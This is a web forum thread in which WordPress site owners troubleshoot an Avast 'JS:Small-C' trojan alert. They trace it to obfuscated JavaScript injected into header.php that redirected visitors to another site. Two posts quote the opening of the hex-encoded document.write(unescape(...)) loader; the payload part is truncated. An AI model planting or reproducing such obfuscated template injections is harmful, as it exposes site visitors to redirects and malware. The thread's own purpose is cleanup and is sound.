JS:Small mallware and can't find it?

[Francois_Dumas]

Today I signed up for Commission Junction to add an affiliate program on my website, and the next thing I know (BEFORE adding any code to the site) I am getting an Avast warning about 'JS:Small-C [Trj]' being found and blocked.

The website is www.europerides.com and the index file points to a folder containing a Wordpress blog.

I have been looking at the html of the blog pages and can't find anything. Nothing was wrong before today, I did not change anything except for the last post which entered on Jan 31st.

I am wondering if it is a false positive, caused by my relationship with Commission Junction If not, how can I find the offending code.. and how could it have entered my blog???
I am a 30+ year computer freak and neverclick on silly things or visit strange shops, porn sites, torrents etc.

I am baffled !

Francois

[Pondus]

This page seems to be <clean>
http://www.UnmaskParasites.com/security-report/?page=www.europerides.com
http://www.google.com/safebrowsing/diagnostic?site=www.europerides.com

looks very clean......

[Francois_Dumas]

Thanks for the reply Pondus. yes, I saw that too. But I still get the warning when accessing it normally.

However, I have narrowed it down to the Wordpress Theme I was using (and have been using for many years).
I now changed the theme and the warning is gone ! So I suspect it is a false positive triggered by something specific to that WP theme!

[Pondus]

It is a bug written in Java Script, if real

could not fiend JS:Small-C but found this JS.Small.dz
http://www.viruslist.com/en/viruses/encyclopedia?virusid=152469

[polonus]

Hi Francois_Dumas,

What to do?
Empty the temporary java cache. [Located in the java console].
Here are the instructions on how to manually remove these malicious applets from the JRE cache directory:

From the Start button, click Settings > Control Panel
In the Control Panel, open the "Java Plug-in Control Panel"
Select the Cache Tab
Click the Clear button inside the Cache Tab, which will clear your JRE cache directory
pictures: http://www.dslreports.com/forum/remark,13803204

To verify current version of Java installed use this tool: »www.java.com/en/download/installed.jsp

polonus

[mentalist3d]

I had a friend phone me today, the same was happening with their own site running an outdated version of WordPress. My PC kept blocking the site, so I checked on the MAC and within seconds I was redirected to a chinese site for a sex musuem. To do an initial clear of the problem, I went to edit the WordPress templates and within the file header.php there was additional coding that had been obscured. I found the code after the tags =

Code: [Select]

<?php wp_head(); ?></head> look for the code:

Code: [Select]

<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%, just delete this extra code and that should provide a quick temporary fix.

[LeanneBoyd]

My blog got hacked today (or in recent 2 days since I've been up there) with this. I found this forum by googling the Malware name - JS:Small-C [Trj]

I tried what mentalist3d suggested and sure enough, I quit getting the Avast alert, so that fixed that.

I am curious.... you said this was a temporary fix? What needs to be done for a permanent fix? I am going to upgrade Wordpress to 2.9.1, as I am still at 2.8.4. And I'm going to change my admin password. However, none of this happened behind the scenes in Dashboard etc. Just on the main site. How on earth did "they" manage to change/add coding in the header.php? Obviously this WAS a hack of the Admin area, to write to the header.php.

Thanks!
Leanne

a P.S. added: Also wanted to note that taking the coding out ALSO "hit" all of my Adsense!!!! I'm getting the generic search box ONLY, at the top. And the sidebar Adsense is back to community service ads.

[mentalist3d]

I don't know enough about WordPress to know how it was done, but but I reckon there must be a bug in older versions that can be exploited. Keeping WordPress upgraded to the latest versions usually keep your site secure as all the latest bugs and weaknesses are fixed.

[computerfreaker]

I had a friend phone me today, the same was happening with their own site running an outdated version of WordPress. My PC kept blocking the site, so I checked on the MAC and within seconds I was redirected to a chinese site for a sex musuem. To do an initial clear of the problem, I went to edit the WordPress templates and within the file header.php there was additional coding that had been obscured. I found the code after the tags =

Code: [Select]

<?php wp_head(); ?></head> look for the code:

Code: [Select]

<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%, just delete this extra code and that should provide a quick temporary fix.

Could you post the rest of that JavaScript on pastebin, then post the pastebin link here?
I just tried de-obfuscating the JavaScript, but you only included part of it - most, including the payload, is missing.

Thanks!

[LeanneBoyd]

 

mentalist3d....

I just came here to update my post, and found yours! YES! Now... there have been reasons I've not updated since 2.8.4! But it's been on my ToDo list now for about a week. And this trojan just sped things up!

I just upgraded to 2.9.1, and it was flawless, per usual (I worry too much I guess... so I just backed up, held my breath, and dove in! Silly me, it took about 7 seconds to update and so far, so good)

And other than the trojan STILL not being back.... the upgrade also brought my Adsense back to normal!

my blog: http://www.1webdiva.com/blog/

Thanks for all the help here in this forum.

[LeanneBoyd]

Could you post the rest of that JavaScript on pastebin, then post the pastebin link here?
I just tried de-obfuscating the JavaScript, but you only included part of it - most, including the payload, is missing.

Thanks!

I went to the Editor in my blog and chose header.php, as that's where he said it would be found. I scrolled down to look for the coding, as yes, I noticed it was only partially given (good move though! without the whole thing posted here, nobody could take it and begin to try and play nasty games with somebody else's site!)

YOU CAN'T MISS IT. It was about 1/3 of the way down the file, and the coding is SO blatantly apparent from all normal coding. Take it from the < script> to the </ script> and just zap it out. FIRST, I did a select-all, and copied the entire header.php to Notepad, just in case. But delete that coding, hit save.

You may find that it screws with AdSense (and perhaps other things, but frankly I didn't look... AdSense is just so apparent, it was the first thing I noticed, being 'altered' - but upgrading to WP 2.9.1 fixed it all)

Make your backup copy, and zap that coding. You sure don't want to leave it there. PC, WP, just parts and pieces; they don't bite!

Good luck
Leanne
my blog: http://www.1webdiva.com/blog/

[profitweaver]

I had a friend phone me today, the same was happening with their own site running an outdated version of WordPress. My PC kept blocking the site, so I checked on the MAC and within seconds I was redirected to a chinese site for a sex musuem. To do an initial clear of the problem, I went to edit the WordPress templates and within the file header.php there was additional coding that had been obscured. I found the code after the tags =

Code: [Select]

***removed***, just delete this extra code and that should provide a quick temporary fix.

Thanks for this. I couldn't understand why this was occurring, but I have been hacked as well!

[danny2001s]

I have the same problem and can't found a code on my site, the blog uses wordpress. After updated, the same issue, avast still found a "JS:Small-C" and can't found it.

Can you please help? http://www.tecno-soft.com/blog/

[Pondus]

please edit your post and remove the code..
do not post malware code in the forum as it will be detected by those entering the forum...

Virscan - your code
http://virscan.org/report/8b281ef0b58bb83825dfdb1d8cbed723.html